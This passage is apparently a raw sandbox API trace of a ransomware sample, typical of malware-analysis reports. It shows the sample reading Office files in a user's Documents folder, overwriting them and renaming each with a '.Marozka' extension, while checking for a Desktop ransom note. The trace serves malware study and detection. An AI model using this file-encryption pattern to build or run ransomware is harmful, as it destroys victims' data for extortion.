returned 0x38 [0048.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx", lpFilePart=0x0) returned 0x33 [0048.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.589] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\auvkv9tfiyvf6wmvfnf_.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.591] GetFileType (hFile=0x2e0) returned 0x1 [0048.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.591] GetFileType (hFile=0x2e0) returned 0x1 [0048.591] WriteFile (in: hFile=0x2e0, lpBuffer=0x27056e4*, nNumberOfBytesToWrite=0x9a70, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27056e4*, lpNumberOfBytesWritten=0x5beab0*=0x9a70, lpOverlapped=0x0) returned 1 [0048.618] CloseHandle (hObject=0x2e0) returned 1 [0048.620] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx", lpFilePart=0x0) returned 0x33 [0048.620] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx.Marozka", lpFilePart=0x0) returned 0x3b [0048.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\auvkv9tfiyvf6wmvfnf_.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x274f4570, ftCreationTime.dwHighDateTime=0x1d4c920, ftLastAccessTime.dwLowDateTime=0xae2300b0, ftLastAccessTime.dwHighDateTime=0x1d477c1, ftLastWriteTime.dwLowDateTime=0xdfb502af, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9a70)) returned 1 [0048.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.620] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\auvkv9tfiyvf6wmvfnf_.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\auvkv9tfiyvf6wmvfnf_.xlsx.marozka")) returned 1 [0048.621] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc", lpFilePart=0x0) returned 0x27 [0048.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.621] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bawl7u1py.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.621] GetFileType (hFile=0x2e0) returned 0x1 [0048.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.621] GetFileType (hFile=0x2e0) returned 0x1 [0048.622] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x5426 [0048.622] ReadFile (in: hFile=0x2e0, lpBuffer=0x270f65c, nNumberOfBytesToRead=0x5426, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x270f65c*, lpNumberOfBytesRead=0x5beabc*=0x5426, lpOverlapped=0x0) returned 1 [0048.622] CloseHandle (hObject=0x2e0) returned 1 [0048.644] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.644] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.644] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc", lpFilePart=0x0) returned 0x27 [0048.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bawl7u1py.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.645] GetFileType (hFile=0x2e0) returned 0x1 [0048.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.645] GetFileType (hFile=0x2e0) returned 0x1 [0048.645] WriteFile (in: hFile=0x2e0, lpBuffer=0x2776938*, nNumberOfBytesToWrite=0x5430, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2776938*, lpNumberOfBytesWritten=0x5beab0*=0x5430, lpOverlapped=0x0) returned 1 [0048.647] CloseHandle (hObject=0x2e0) returned 1 [0048.672] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc", lpFilePart=0x0) returned 0x27 [0048.673] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc.Marozka", lpFilePart=0x0) returned 0x2f [0048.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bawl7u1py.doc"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77f1a60, ftCreationTime.dwHighDateTime=0x1d4c856, ftLastAccessTime.dwLowDateTime=0x19421050, ftLastAccessTime.dwHighDateTime=0x1d4c72e, ftLastWriteTime.dwLowDateTime=0xdfbeb79b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5430)) returned 1 [0048.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.673] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bawl7u1py.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\baWl7U1py.doc.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bawl7u1py.doc.marozka")) returned 1 [0048.674] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx", lpFilePart=0x0) returned 0x24 [0048.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bqhdo.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.674] GetFileType (hFile=0x2e0) returned 0x1 [0048.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.674] GetFileType (hFile=0x2e0) returned 0x1 [0048.674] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x182a7 [0048.675] ReadFile (in: hFile=0x2e0, lpBuffer=0x3714680, nNumberOfBytesToRead=0x182a7, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x3714680*, lpNumberOfBytesRead=0x5beabc*=0x182a7, lpOverlapped=0x0) returned 1 [0048.677] CloseHandle (hObject=0x2e0) returned 1 [0048.707] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.708] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx", lpFilePart=0x0) returned 0x24 [0048.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.708] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bqhdo.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.710] GetFileType (hFile=0x2e0) returned 0x1 [0048.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.710] GetFileType (hFile=0x2e0) returned 0x1 [0048.710] WriteFile (in: hFile=0x2e0, lpBuffer=0x378d428*, nNumberOfBytesToWrite=0x182b0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x378d428*, lpNumberOfBytesWritten=0x5beab0*=0x182b0, lpOverlapped=0x0) returned 1 [0048.713] CloseHandle (hObject=0x2e0) returned 1 [0048.760] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx", lpFilePart=0x0) returned 0x24 [0048.760] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx.Marozka", lpFilePart=0x0) returned 0x2c [0048.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.760] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bqhdo.docx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b2ff30, ftCreationTime.dwHighDateTime=0x1d4d193, ftLastAccessTime.dwLowDateTime=0xe590f3c0, ftLastAccessTime.dwHighDateTime=0x1d462e2, ftLastWriteTime.dwLowDateTime=0xdfca7897, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x182b0)) returned 1 [0048.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.761] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bqhdo.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bQhdO.docx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bqhdo.docx.marozka")) returned 1 [0048.761] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx", lpFilePart=0x0) returned 0x2d [0048.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\chmpxax-l_xafu.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.762] GetFileType (hFile=0x2e0) returned 0x1 [0048.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.762] GetFileType (hFile=0x2e0) returned 0x1 [0048.762] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x11ca8 [0048.762] ReadFile (in: hFile=0x2e0, lpBuffer=0x27c947c, nNumberOfBytesToRead=0x11ca8, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27c947c*, lpNumberOfBytesRead=0x5beabc*=0x11ca8, lpOverlapped=0x0) returned 1 [0048.763] CloseHandle (hObject=0x2e0) returned 1 [0048.834] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.837] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx", lpFilePart=0x0) returned 0x2d [0048.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.837] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\chmpxax-l_xafu.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.839] GetFileType (hFile=0x2e0) returned 0x1 [0048.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.839] GetFileType (hFile=0x2e0) returned 0x1 [0048.839] WriteFile (in: hFile=0x2e0, lpBuffer=0x26710cc*, nNumberOfBytesToWrite=0x11cb0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26710cc*, lpNumberOfBytesWritten=0x5beab0*=0x11cb0, lpOverlapped=0x0) returned 1 [0048.841] CloseHandle (hObject=0x2e0) returned 1 [0048.844] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx", lpFilePart=0x0) returned 0x2d [0048.844] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx.Marozka", lpFilePart=0x0) returned 0x35 [0048.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.844] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\chmpxax-l_xafu.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51a7cac0, ftCreationTime.dwHighDateTime=0x1d4d647, ftLastAccessTime.dwLowDateTime=0x1b2e4080, ftLastAccessTime.dwHighDateTime=0x1d4b254, ftLastWriteTime.dwLowDateTime=0xdfd8c727, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x11cb0)) returned 1 [0048.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.844] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\chmpxax-l_xafu.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\chmpXAX-l_XafU.xlsx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\chmpxax-l_xafu.xlsx.marozka")) returned 1 [0048.845] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx", lpFilePart=0x0) returned 0x23 [0048.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.845] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\dlvh.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.845] GetFileType (hFile=0x2e0) returned 0x1 [0048.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.845] GetFileType (hFile=0x2e0) returned 0x1 [0048.845] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1071d [0048.846] ReadFile (in: hFile=0x2e0, lpBuffer=0x268326c, nNumberOfBytesToRead=0x1071d, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x268326c*, lpNumberOfBytesRead=0x5beabc*=0x1071d, lpOverlapped=0x0) returned 1 [0048.847] CloseHandle (hObject=0x2e0) returned 1 [0048.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx", lpFilePart=0x0) returned 0x23 [0048.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\dlvh.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.992] GetFileType (hFile=0x2e0) returned 0x1 [0048.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.992] GetFileType (hFile=0x2e0) returned 0x1 [0048.993] WriteFile (in: hFile=0x2e0, lpBuffer=0x2701728*, nNumberOfBytesToWrite=0x10720, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2701728*, lpNumberOfBytesWritten=0x5beab0*=0x10720, lpOverlapped=0x0) returned 1 [0048.996] CloseHandle (hObject=0x2e0) returned 1 [0049.216] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx", lpFilePart=0x0) returned 0x23 [0049.216] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx.Marozka", lpFilePart=0x0) returned 0x2b [0049.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0049.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\dlvh.pptx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32cd0a20, ftCreationTime.dwHighDateTime=0x1d4d336, ftLastAccessTime.dwLowDateTime=0x81c905c0, ftLastAccessTime.dwHighDateTime=0x1d4d287, ftLastWriteTime.dwLowDateTime=0xe0014f1f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x10720)) returned 1 [0049.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0049.216] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\dlvh.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Dlvh.pptx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\dlvh.pptx.marozka")) returned 1 [0049.267] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx", lpFilePart=0x0) returned 0x2a [0049.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0049.267] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\esP8vTXY4cO.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\esp8vtxy4co.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0049.267] GetFileType (hFile=0x2e0) returned 0x1 [0049.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0049.267] GetFileType (hFile=0x2e0) returned 0x1 [0049.267] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x49ff [0049.267] ReadFile (in: hFile=0x2e0, lpBuffer=0x27122c0, nNumberOfBytesToRead=0x49ff, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27122c0*, lpNumberOfBytesRead=0x5beabc*=0x49ff, lpOverlapped=0x0) returned 1 [0049.268] CloseHandle (hObject=0x2e0) returned 1 [0049.288] GetFullPathNameW (in: 